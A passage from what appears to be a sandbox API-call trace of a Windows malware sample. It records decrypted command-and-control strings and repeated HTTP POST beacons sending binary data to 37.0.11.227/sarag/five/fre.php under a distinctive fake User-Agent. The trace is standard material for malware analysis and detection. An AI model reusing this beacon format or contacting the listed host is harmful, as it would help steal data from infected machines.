[0307.181] GetProcessHeap () returned 0x690000 [0307.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0307.181] GetProcessHeap () returned 0x690000 [0307.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.182] GetProcessHeap () returned 0x690000 [0307.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0307.182] GetProcessHeap () returned 0x690000 [0307.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0307.182] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.183] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.183] GetProcessHeap () returned 0x690000 [0307.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0307.183] GetProcessHeap () returned 0x690000 [0307.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.184] send (s=0xa38, buf=0x6ad508*, len=242, flags=0) returned 242 [0307.184] send (s=0xa38, buf=0x6aba40*, len=159, flags=0) returned 159 [0307.184] GetProcessHeap () returned 0x690000 [0307.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0307.184] recv (in: s=0xa38, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0307.264] GetProcessHeap () returned 0x690000 [0307.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0307.265] GetProcessHeap () returned 0x690000 [0307.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0307.266] GetProcessHeap () returned 0x690000 [0307.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0307.268] GetProcessHeap () returned 0x690000 [0307.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0307.268] closesocket (s=0xa38) returned 0 [0307.268] GetProcessHeap () returned 0x690000 [0307.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0307.269] GetProcessHeap () returned 0x690000 [0307.269] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.269] GetProcessHeap () returned 0x690000 [0307.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0307.270] GetProcessHeap () returned 0x690000 [0307.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0307.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe0c) returned 0xa38 [0307.272] Sleep (dwMilliseconds=0xea60) [0307.273] GetProcessHeap () returned 0x690000 [0307.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0307.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0307.285] GetProcessHeap () returned 0x690000 [0307.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0307.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.286] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.287] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.288] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.288] GetProcessHeap () returned 0x690000 [0307.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0307.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.289] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0307.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.290] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.290] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0307.290] GetProcessHeap () returned 0x690000 [0307.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0307.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.291] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.292] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.293] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.294] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.294] GetProcessHeap () returned 0x690000 [0307.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0307.295] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.295] GetProcessHeap () returned 0x690000 [0307.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0307.295] GetProcessHeap () returned 0x690000 [0307.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0307.296] GetProcessHeap () returned 0x690000 [0307.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0307.297] GetProcessHeap () returned 0x690000 [0307.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0307.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.305] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0307.316] GetProcessHeap () returned 0x690000 [0307.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0307.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.317] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.318] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.318] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.318] GetProcessHeap () returned 0x690000 [0307.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0307.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.320] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0307.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.321] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.321] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0307.322] GetProcessHeap () returned 0x690000 [0307.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.322] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0307.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.323] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0307.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.324] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0307.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.325] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0307.325] GetProcessHeap () returned 0x690000 [0307.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0307.325] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0307.325] GetProcessHeap () returned 0x690000 [0307.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0307.325] socket (af=2, type=1, protocol=6) returned 0xa3c [0307.326] connect (s=0xa3c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0307.351] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0307.351] GetProcessHeap () returned 0x690000 [0307.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0307.351] GetProcessHeap () returned 0x690000 [0307.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0307.351] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.352] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0307.352] GetProcessHeap () returned 0x690000 [0307.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0307.352] GetProcessHeap () returned 0x690000 [0307.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.353] GetProcessHeap () returned 0x690000 [0307.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0307.353] GetProcessHeap () returned 0x690000 [0307.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0307.353] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.354] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.354] GetProcessHeap () returned 0x690000 [0307.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0307.354] GetProcessHeap () returned 0x690000 [0307.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.355] send (s=0xa3c, buf=0x6ad508*, len=242, flags=0) returned 242 [0307.355] send (s=0xa3c, buf=0x6aba40*, len=159, flags=0) returned 159 [0307.355] GetProcessHeap () returned 0x690000 [0307.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0307.355] recv (in: s=0xa3c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0307.431] GetProcessHeap () returned 0x690000 [0307.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0307.432] GetProcessHeap () returned 0x690000 [0307.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0307.433] GetProcessHeap () returned 0x690000 [0307.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0307.433] GetProcessHeap () returned 0x690000 [0307.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0307.434] closesocket (s=0xa3c) returned 0 [0307.434] GetProcessHeap () returned 0x690000 [0307.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0307.434] GetProcessHeap () returned 0x690000 [0307.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.435] GetProcessHeap () returned 0x690000 [0307.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0307.437] GetProcessHeap () returned 0x690000 [0307.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0307.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1504) returned 0xa3c [0307.439] Sleep (dwMilliseconds=0xea60) [0307.442] GetProcessHeap () returned 0x690000 [0307.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0307.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.448] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0307.463] GetProcessHeap () returned 0x690000 [0307.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0307.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.464] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.465] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.466] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.466] GetProcessHeap () returned 0x690000 [0307.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0307.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.471] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0307.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.472] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.475] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0307.475] GetProcessHeap () returned 0x690000 [0307.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.476] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.476] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.477] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.478] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.478] GetProcessHeap () returned 0x690000 [0307.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0307.478] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.478] GetProcessHeap () returned 0x690000 [0307.479] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0307.479] GetProcessHeap () returned 0x690000 [0307.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.480] GetProcessHeap () returned 0x690000 [0307.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0307.480] GetProcessHeap () returned 0x690000 [0307.480] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0307.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.487] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0307.492] GetProcessHeap () returned 0x690000 [0307.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0307.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.493] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.494] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.495] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.495] GetProcessHeap () returned 0x690000 [0307.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0307.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.496] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0307.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.497] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.498] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0307.498] GetProcessHeap () returned 0x690000 [0307.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0307.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.500] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0307.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0307.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.502] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0307.502] GetProcessHeap () returned 0x690000 [0307.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0307.502] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0307.502] GetProcessHeap () returned 0x690000 [0307.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0307.502] socket (af=2, type=1, protocol=6) returned 0xa40 [0307.502] connect (s=0xa40, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0307.551] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0307.583] GetProcessHeap () returned 0x690000 [0307.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0307.583] GetProcessHeap () returned 0x690000 [0307.583] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0307.585] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.586] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0307.586] GetProcessHeap () returned 0x690000 [0307.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0307.586] GetProcessHeap () returned 0x690000 [0307.587] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.587] GetProcessHeap () returned 0x690000 [0307.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0307.587] GetProcessHeap () returned 0x690000 [0307.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0307.588] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.588] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.588] GetProcessHeap () returned 0x690000 [0307.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0307.588] GetProcessHeap () returned 0x690000 [0307.589] 